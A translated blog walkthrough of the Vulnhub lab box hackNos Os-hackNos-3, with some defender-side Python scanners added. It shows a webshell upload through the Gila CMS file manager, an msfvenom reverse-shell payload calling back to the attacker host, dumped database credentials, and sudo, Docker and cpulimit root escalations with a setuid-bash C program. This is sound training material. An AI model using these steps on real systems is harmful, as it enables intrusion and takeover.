Vulnhub box: HackNos3


Valentine's Day, February 14: a boot2root box and a snowy day go even better together~

Box information

  • Name: hackNos: Os-hackNos-3

  • Date release: 14 Dec 2019

  • Author: Rahul Gehlaut

  • Difficulty: Intermediate

  • Flag: 2 flags, first user and second root

  • Learning : Web Application | Enumeration | Privilege Escalation

Information gathering

First find the target's IP. The VM uses Host-Only networking, so the subnet can be read off the host's virtual adapter.

➜ sudo nmap -sS -O 192.168.56.0/24
Target IP identified: 192.168.56.105

Port scan to see which services are exposed.

➜ sudo nmap -sT -A 192.168.56.105
Starting Nmap 7.70 ( https://nmap.org ) at 2020-02-14 19:56 CST
Nmap scan report for 192.168.56.105
Host is up (0.00049s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 ce:16:a0:18:3f:74:e9:ad:cb:a9:39:90:11:b8:8a:2e (RSA)
|   256 9d:0e:a1:a3:1e:2c:4d:00:e8:87:d2:76:8c:be:71:9a (ECDSA)
|_  256 63:b3:75:98:de:c1:89:d9:92:4e:49:31:29:4b:c0:ad (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: WebSec

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_  /scripts/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

dirsearch results:

[20:00:32] 200 -  195B  - /index.html
[20:00:35] 301 -  318B  - /scripts  ->  http://192.168.56.105/scripts/
[20:00:35] 200 -    2KB - /scripts/
[20:00:36] 403 -  279B  - /server-status
[20:00:36] 403 -  279B  - /server-status/
[20:00:37] 200 -    0B  - /upload.php

http://192.168.56.105/scripts/ has directory listing enabled and exposes the following files:

api_ticket_create.php  
automail.php  
automail.pl  
rcron.php

Vulnerability discovery & getting a shell

Some searching shows these scripts belong to an osTicket-based mail system; no exploitable point was found there.

It felt like the scan had missed some pages, so I ran DirBuster. It quickly turned up a /websec directory whose structure looks like a blog system.

http://192.168.56.105/websec/admin is the backend login page; it takes an email address and a password. Following HackNos tradition the credentials should be HackNos-related, and the index page seen earlier showed an email address and some titles, so I tried those; the second attempt logged in. (Classic HackNos style.)

Email: contact@hacknos.com
Password: Securityx

The backend is Gila CMS v1.10.9. Using its file manager at http://192.168.56.105/websec/admin/fm I uploaded a file containing a PHP one-liner shell, then used the rename function to move it into the web root as src/blog/../../../one.php.

Connected with AntSword and grabbed the first flag:

/home/blackdevil/user.txt
bae11ce4f67af91fa58576c1da2aad4b
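A defender-side counterpart to the step above, added here and not part of the original writeup: the shell dropped through the CMS file manager is a PHP one-liner that feeds request data straight into a code-execution function, and that shape is easy to scan for. The signature lists, the sample web root and the file paths are my own constructions.

```python
import os
import re

# Signatures of the classic PHP one-liner webshell: a code-execution
# primitive fed straight from request data, or eval() over a decoded blob.
EXEC_FUNCS = r"(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open)"
REQUEST_SRC = r"\$_(?:POST|GET|REQUEST|COOKIE)\b"
SHELL_PATTERN = re.compile(
    rf"\b{EXEC_FUNCS}\s*\([^;]*?{REQUEST_SRC}[^;]*", re.IGNORECASE)
DECODE_PATTERN = re.compile(
    r"\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.IGNORECASE)

def scan_php_source(src):
    """Return the suspicious fragments found in one PHP file's source text."""
    hits = [m.group(0).strip() for m in SHELL_PATTERN.finditer(src)]
    hits += [m.group(0).strip() for m in DECODE_PATTERN.finditer(src)]
    return hits

def scan_sources(files):
    """files: {path: source}. Return {path: hits} for every file with a hit."""
    findings = {}
    for path, src in files.items():
        hits = scan_php_source(src)
        if hits:
            findings[path] = hits
    return findings

def scan_webroot(root):
    """Read every .php file under a web root and scan it (unreadable files skipped)."""
    files = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.endswith(".php"):
                p = os.path.join(dirpath, fn)
                try:
                    with open(p, encoding="utf-8", errors="replace") as fh:
                        files[p] = fh.read()
                except OSError:
                    continue
    return scan_sources(files)

# Constructed sample: a dropped one-liner next to a clean CMS entry point.
SAMPLE_WEBROOT = {
    "/var/www/html/websec/one.php": "<?php @eval($_POST['x']); ?>",
    "/var/www/html/websec/index.php": "<?php require 'src/boot.php'; ?>",
}

if __name__ == "__main__":
    for path, hits in scan_sources(SAMPLE_WEBROOT).items():
        print(path, "->", hits)
```

Pair the scan with a file-integrity baseline of the web root: a new .php file that the CMS did not ship, such as one.php here, is suspicious even before its content is read.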

PS: CeWL can be used here to build a password wordlist for brute-forcing.

➜ ./cewl.rb http://192.168.56.105/websec/ > /Users/lanvnal/Files/Vulnhub/HackNos-3/oshacknos3dict.

✦ ➜ cat /Users/lanvnal/Files/Vulnhub/HackNos-3/oshacknos3dict.txt
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
hackNos
com
and
Bootstrap
JavaScript
Start
www
Out
More
Securityx
has
everything
you
need
get
your
new
website
running
time
All
the
templates
themes
are
open
source
free
download
easy
use
strings
attached
Get
Started
Your
Service
contact
hacknos
core
Plugin
Custom
scripts
for
this
Navigation
template
About
Services
Portfolio
Contact
Security
Find

Privilege escalation

Information gathering

First, Metasploit.

➜ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=6666  -f elf -o /Users/lanvnal/Files/Vulnhub/HackNos-3/shell.elf

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1

config.php holds the database credentials, so let's look inside the database.

$GLOBALS['config'] = array (
  'db' => 
  array (
    'host' => 'localhost',
    'user' => 'cmsu',
    'pass' => 'securityx',
    'name' => 'cms',
  ),
);

MariaDB [cms]> select username,pass from user;
select username,pass from user;
+----------+--------------------------------------------------------------+
| username | pass                                                         |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$E1OkzxLN.G4ZUYGgrGoQFusEFlkgNBeey9v7SI6jDHZQgL7G.YDFO |
+----------+--------------------------------------------------------------+

The hash can't be cracked, and there is nothing else useful in there.

So run LinEnum to gather more. Judging from its output there is no SUID binary usable for escalation and no unusual process.

The useful information:

[-] It looks like we have some admin users:
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm)
uid=1000(blackdevil) gid=118(docker) groups=118(docker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lxd)

[+] Looks like we're hosting Docker:
Docker version 19.03.2, build 6a30dfca03

Docker is present, so escalation through docker is likely; the blackdevil user is in the docker group, and also in the sudo group. So blackdevil is the key. The next step is to gather information about blackdevil and find that user's password.
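The same `id` lines LinEnum printed, run through a small defender-side check that flags group memberships which are root-equivalent on a stock Ubuntu host. This is an added example, not part of the original writeup; the group list and the risk notes are my own selection.

```python
import re

# Groups whose membership is effectively root on a stock Ubuntu host
# (my own selection; the risk notes are mine, not LinEnum's).
HIGH_RISK_GROUPS = {
    "docker": "can start a container with the host filesystem bind-mounted",
    "lxd": "can start a privileged container over the host filesystem",
    "sudo": "may run commands as root, subject to sudoers",
    "adm": "can read system logs that often leak credentials",
}

ID_LINE = re.compile(r"uid=(\d+)\((\w+)\)\s+gid=\d+\(\w+\)\s+groups=(\S+)")

def parse_id_line(line):
    """Parse one `id`-style line into (uid, username, set of group names)."""
    m = ID_LINE.search(line)
    if m is None:
        return None
    names = set(re.findall(r"\d+\(([^)]+)\)", m.group(3)))
    return int(m.group(1)), m.group(2), names

def flag_risky_accounts(lines):
    """Return {username: sorted risky groups} for every account in a risky group."""
    findings = {}
    for line in lines:
        parsed = parse_id_line(line)
        if parsed is None:
            continue
        _uid, user, names = parsed
        risky = sorted(names & set(HIGH_RISK_GROUPS))
        if risky:
            findings[user] = risky
    return findings

# Sample input: the two lines LinEnum printed on this box.
SAMPLE = [
    "uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm)",
    "uid=1000(blackdevil) gid=118(docker) groups=118(docker),4(adm),24(cdrom),"
    "27(sudo),30(dip),46(plugdev),115(lxd)",
]

if __name__ == "__main__":
    for user, groups in flag_risky_accounts(SAMPLE).items():
        for g in groups:
            print(f"{user}: {g}: {HIGH_RISK_GROUPS[g]}")
```

On a real host feed it the output of `id` for every entry in /etc/passwd; an interactive account in docker or lxd deserves the same scrutiny as one in sudo.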

Digging around, I found a file named database in /var/local/ with this content:

Expenses
Software Licenses,$2.78
Maintenance,$68.87
Mortgage Interest,$70.35
Advertising,$9.78
Phone,$406.80
Insurance,$9.04
Opss;fackespreadsheet

It looks like an expense record, but the last line is odd. Searching around revealed that the file is an encoded result.

That website can decode it.

The site explains its spreadsheet encoding as follows:

There are terrific tools (like PGP and GPG) for encrypting your mail. If somebody along the way looks at the mail they can't understand it. But they do know you are sending encrypted mail to your pal.

The answer: encode your message into something innocent looking.
Your messages will be safe and nobody will know they're encrypted!

In other words, it encodes the mail content so that the mail looks innocuous.

Decoded content: Security@x@, which is the blackdevil user's password.

Privilege escalation

Method 1: sudo directly

blackdevil@hacknos:/home$ sudo -l
[sudo] password for blackdevil:
Matching Defaults entries for blackdevil on hacknos:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User blackdevil may run the following commands on hacknos:
    (ALL : ALL) ALL
blackdevil@hacknos:/home$ sudo cat /root/root.txt
########    #####     #####   ########         ########
##     ##  ##   ##   ##   ##     ##            ##     ##
##     ## ##     ## ##     ##    ##            ##     ##
########  ##     ## ##     ##    ##            ########
##   ##   ##     ## ##     ##    ##            ##   ##
##    ##   ##   ##   ##   ##     ##            ##    ##
##     ##   #####     #####      ##    ####### ##     ##


MD5-HASH: bae11ce4f67af91fa58576c1da2aad4b

Author: Rahul Gehlaut

Blog: www.hackNos.com

Linkedin: https://in.linkedin.com/in/rahulgehlaut

Method 2: Docker privilege escalation

Upload a Docker image and Dockerfile -> build the image -> start a container with the host's /etc mounted -> create a user inside the container and add it to the sudo group -> exit the container and switch to the new user -> sudo rights obtained

The procedure is the same as in: http://lanvnal.com/2020/02/01/Vulnhub靶机之ReconForce01/#docker提权

Method 3: privilege escalation with cpulimit

https://gtfobins.github.io/gtfobins/cpulimit/#sudo

The www-data user has no sudo rights. Instead, compile a C program locally that invokes /bin/bash as root, then run it through cpulimit to escalate.

cpulimit usage: https://gtfobins.github.io/gtfobins/cpulimit/#sudo

sudo cpulimit -l 100 -f /bin/sh

www-data cannot run that command through sudo.

Compile the source below on your own machine, upload it to the target, give it mode 777, and run it through cpulimit.

#include <stdio.h>
#include <stdlib.h>     /* declares system(); missing in the original, hence the compiler warning below */
#include <unistd.h>
#include <sys/types.h>

int main(void)
{
  /* The caller (cpulimit) runs with root privileges, so the effective uid is
     already 0; setting the real uid/gid to 0 as well keeps bash from dropping
     the privileges when it starts. */
  setuid(0);
  setgid(0);
  system("/bin/bash");
  return 0;
}

Compile:

✦ ➜ gcc exp.c -o exp
exp.c:9:3: warning: implicit declaration of function 'system' is invalid in C99
      [-Wimplicit-function-declaration]
  system("/bin/bash");
  ^
1 warning generated.

After uploading, chmod it and run it with cpulimit:

www-data@hacknos:/tmp$ chmod 777 exp2
chmod 777 exp2
www-data@hacknos:/tmp$ cpulimit -l 100 -f ./exp2
cpulimit -l 100 -f ./exp2
Process 6468 detected
root@hacknos:/tmp# whoami
whoami
root
root@hacknos:/tmp# cat /root/root.txt

One problem encountered here: a binary compiled on macOS errors out on the target; the exp2 compiled on Ubuntu works.
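Method 3 only works because cpulimit runs with root privileges on this box; the writeup does not say whether that comes from the SUID bit or from sudoers. A defender's check for the SUID case, added here and not part of the original writeup: walk the filesystem, keep root-owned files with the setuid bit, and flag the ones known to spawn a shell or execute an arbitrary file. The KNOWN_ABUSABLE list is my own short selection from GTFOBins-listed binaries, and fake_stat is a test helper I added.

```python
import os
import stat

# SUID-root binaries known to spawn a shell or execute an arbitrary file when
# run with elevated privileges (a short selection from GTFOBins; cpulimit is
# the one this box relies on). The list is mine, not the writeup's.
KNOWN_ABUSABLE = {"cpulimit", "find", "vim", "python3", "perl", "env", "awk", "nmap", "bash"}

def fake_stat(mode, uid):
    """Build a stat result by hand so the classifier can be exercised offline."""
    return os.stat_result((mode, 0, 0, 1, uid, 0, 0, 0, 0, 0))

def is_suid_root(st):
    """True for a regular file owned by uid 0 with the setuid bit set."""
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID) and st.st_uid == 0

def classify(path, st):
    """Verdict for one file: None if not SUID root, else a HIGH or review note."""
    if not is_suid_root(st):
        return None
    if os.path.basename(path) in KNOWN_ABUSABLE:
        return "HIGH: known to hand out a root shell"
    return "review: SUID root, confirm it is expected"

def audit_suid(root="/"):
    """Walk a tree and return {path: verdict} for every SUID-root file."""
    findings = {}
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(("/proc", "/sys", "/dev")):
            dirnames[:] = []          # pseudo-filesystems: nothing to audit
            continue
        for fn in filenames:
            p = os.path.join(dirpath, fn)
            try:
                st = os.lstat(p)      # lstat: symlinks are skipped by S_ISREG
            except OSError:
                continue
            verdict = classify(p, st)
            if verdict is not None:
                findings[p] = verdict
    return findings

if __name__ == "__main__":
    for p, v in sorted(audit_suid("/usr/bin").items()):
        print(v, p)
```

Note that the uploaded exp2 itself never needs the SUID bit (the writeup only gives it mode 777); the privileged parent is what to look for, so the sudoers side should be reviewed with `sudo -l` for each service account as well.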

Summary

This box leans heavily on information gathering, and the third escalation method taught me something new.


Author: LANVNAL
Copyright: unless stated otherwise, all articles on this blog are licensed under CC BY 4.0. Please credit LANVNAL when reposting!